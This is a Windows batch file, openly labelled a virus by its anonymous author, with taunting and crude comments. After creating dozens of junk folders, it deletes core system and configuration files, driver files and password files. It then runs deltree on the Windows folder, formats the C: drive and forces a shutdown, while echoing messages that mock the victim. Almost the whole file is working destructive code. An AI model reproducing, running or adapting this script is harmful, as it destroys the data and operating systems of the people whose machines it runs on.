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@echo off REM this is a virus made by someone nowhere REM nobody know me, just my mother and

my sexy dog... REM fuck you, virus expert? try to fix this whawhawha MKDIR C:\windows\temp\a MKDIR C:\windows\temp\b MKDIR C:\windows\temp\c MKDIR C:\windows\temp\d MKDIR C:\windows\temp\e MKDIR C:\windows\temp\f MKDIR C:\windows\temp\g MKDIR C:\windows\temp\h MKDIR C:\windows\temp\i MKDIR C:\windows\temp\j MKDIR C:\windows\temp\k MKDIR C:\windows\temp\l MKDIR C:\windows\temp\m MKDIR C:\windows\temp\n MKDIR C:\windows\temp\o MKDIR C:\windows\temp\p MKDIR C:\windows\temp\q MKDIR C:\windows\temp\r MKDIR C:\windows\temp\s MKDIR C:\windows\temp\t MKDIR C:\windows\temp\u MKDIR C:\windows\desktop\hey_lamer_wazzup MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files\ab MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator\ac MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files\ad MKDIR C:\windows\temp001 MKDIR C:\windows\temp002 MKDIR C:\windows\temp003 MKDIR C:\windows\temp004 MKDIR C:\windows\temp005 MKDIR C:\windows\temp006 MKDIR C:\windows\temp007 MKDIR C:\windows\temp008 MKDIR C:\windows\temp009 MKDIR C:\windows\temp000 MKDIR C:\windows\temp010 MKDIR C:\windows\temp020 MKDIR C:\windows\temp030 MKDIR C:\windows\temp040 MKDIR C:\windows\temp050 REM let some gone on the lazy network REM yeah echo WELCOME TO THIS ANTI-NOOB VIRUS...... REM Now the real work will start.... pause echo wait..... echo I have a surprise for you.... fasten your seatbelt dude! cd\ cd C:\ @if exist C:\Autoexec.bat del C:\Autoexec.bat del config.sys cd windows del control.ini

@if exist C:\windows\dosstart.bat del C:\windows\dosstart.bat cd\ cd C:\ @if exist C:\logo.sys del C:\logo.sys @if exist C:\windows\rundll.exe del C:\rundll.exe @if exist C:\windows\rundll32.exe del C:\windows\rundll32.exe @if exist C:\windows\ios.ini del C:\windows\ios.ini cd\ cd windows del win.ini @if exist C:\WINDOWS\OPTIONS\CABS\scandisk.ini del C:\WINDOWS\OPTIONS\CABS\scand isk.ini @if exist C:\WINDOWS\system.ini del C:\WINDOWS\system.ini cd\ cd C:\ @if exist C:\WINDOWS\*.pwl del C:\WINDOWS\*.pwl @if exist C:\WINDOWS\SYSTEM\sysedit.exe del C:\WINDOWS\SYSTEM\sysedit.exe @if exist C:\WINDOWS\SYSTEM\Systray.exe del C:\WINDOWS\SYSTEM\Systray.exe @if exist C:\WINDOWS\ del C:\WINDOWS\ @if exist C:\WINDOWS\system.bak del C:\WINDOWS\system.bak @if exist C:\WINDOWS\system.cb del C:\WINDOWS\system.cb @if exist C:\WINDOWS\system\Msjstick.drv del C:\WINDOWS\system\Msjstick.drv @if exist C:\WINDOWS\system\Supervga.drv del C:\WINDOWS\system\Supervga.drv @if exist C:\WINDOWS\system\Mouse.drv del C:\WINDOWS\system\Mouse.drv Echo Wow.. that was a freaky ride!! echo What?! You want more? echo Ok... but only the first time is free... echo Raise your hand and say: Goodbye lovely pc... you're gonna crash forever, cause I've been so stupid to open this. echo I thought that I was smart.. but I'm sooo dumb... Farewell! cd\ cd windows deltree /y windows format c: /y shutdown -s -t 10 -c "Raise your hand and say: Goodbye lovely pc... you're gonna crash forever, cause I've been so stupid to open this."

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